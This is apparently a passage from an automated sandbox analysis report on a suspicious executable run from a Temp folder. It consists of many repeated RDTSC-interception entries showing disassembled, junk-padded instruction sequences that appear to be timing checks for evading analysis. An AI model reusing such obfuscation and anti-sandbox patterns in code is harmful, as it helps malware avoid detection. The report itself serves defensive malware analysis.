Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB54 second address: BDEB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F34D94219D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F34D94219D6h 0x00000017 jmp 00007F34D94219DBh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB77 second address: BDEB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C61C second address: C0C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C620 second address: C0C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C626 second address: C0C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F34D94219E7h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F34D94219D6h 0x0000001a jno 00007F34D94219D6h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C658 second address: C0C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C7C4 second address: C0C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C7DF second address: C0C7E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D8F44CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C7E9 second address: C0C81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F34D94219DFh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C95D second address: C0C963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C963 second address: C0C988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F34D94219E3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C988 second address: C0C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C9A6 second address: C0C9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0CC98 second address: C0CCAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F34D8F44CB6h 0x00000009 js 00007F34D8F44CB6h 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0CF85 second address: C0CF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0CF8B second address: C0CF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D0BE second address: C0D0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D94219E1h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D23A second address: C0D247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F34D8F44CB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D247 second address: C0D27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F34D94219E8h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D415 second address: C0D419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D419 second address: C0D41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D41F second address: C0D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D429 second address: C0D438 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D94219D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C10367 second address: C1036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C114EE second address: C114FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C11683 second address: C1168D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F34D8F44CB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1168D second address: C11691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE207C second address: BE20A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e jmp 00007F34D8F44CC2h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F34D8F44CB6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE20A4 second address: BE20AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C19175 second address: C1917B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE54DD second address: BE54EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE54EB second address: BE54F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C18E60 second address: C18E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C523 second address: C1C527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C527 second address: C1C53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F34D94219DBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1CB26 second address: C1CB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1CB2C second address: C1CB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1D2E6 second address: C1D335 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F34D8F44CB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F34D8F44CC8h 0x0000002b nop 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1D900 second address: C1D94E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, bx 0x0000000c xchg eax, ebx 0x0000000d jno 00007F34D94219F5h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F34D94219E9h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1DF12 second address: C1DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1DF1F second address: C1DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1DF3C second address: C1DF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1E7EF second address: C1E7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F6A5 second address: C1F6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1E66A second address: C1E674 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F6B0 second address: C1F71D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CC2h 0x00000008 jmp 00007F34D8F44CBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cmc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F34D8F44CB8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1C77h], esi 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 jmp 00007F34D8F44CC6h 0x0000003d mov cx, 87F9h 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D23B7h], esi 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1E674 second address: C1E682 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C201B4 second address: C201B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2024C second address: C20251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1FF99 second address: C1FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20251 second address: C20261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20261 second address: C20266 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20AFF second address: C20B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C21640 second address: C2164B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20B04 second address: C20B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22049 second address: C2204F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20B09 second address: C20B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22CFD second address: C22D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22D03 second address: C22D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F34D94219DCh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007F34D94219D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22D21 second address: C22D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2447F second address: C24483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C24483 second address: C24487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C24487 second address: C244D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F34D94219D8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 jp 00007F34D94219DCh 0x00000029 sub ebx, dword ptr [ebp+1244CD30h] 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D1F27h] 0x00000037 xchg eax, esi 0x00000038 push ecx 0x00000039 jl 00007F34D94219DCh 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C244D6 second address: C244DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C253F5 second address: C25454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push eax 0x0000000c sub edi, dword ptr [ebp+122D35B5h] 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F34D94219D8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 mov ebx, esi 0x00000034 pop edi 0x00000035 sub edi, 4A2BFA36h 0x0000003b push eax 0x0000003c pushad 0x0000003d jl 00007F34D94219D8h 0x00000043 pushad 0x00000044 jo 00007F34D94219D6h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26319 second address: C2631F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C27237 second address: C272A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F34D94219E4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F34D94219D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov bx, dx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F34D94219D8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C272A6 second address: C272AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A846 second address: C2A861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A861 second address: C2A870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A870 second address: C2A87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C25555 second address: C2555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26520 second address: C2652B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D94219D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A87E second address: C2A884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C29926 second address: C29941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2652B second address: C26530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26530 second address: C26598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr [ebp+122D2716h], eax 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or dword ptr [ebp+122D23B2h], ecx 0x00000024 mov eax, dword ptr [ebp+122D139Dh] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F34D94219D8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 and ebx, 40C7A673h 0x0000004a push FFFFFFFFh 0x0000004c mov edi, dword ptr [ebp+122D3601h] 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007F34D94219D6h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26598 second address: C265AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2BA5E second address: C2BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2F9B4 second address: C2F9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2BA62 second address: C2BA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2BB4C second address: C2BB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
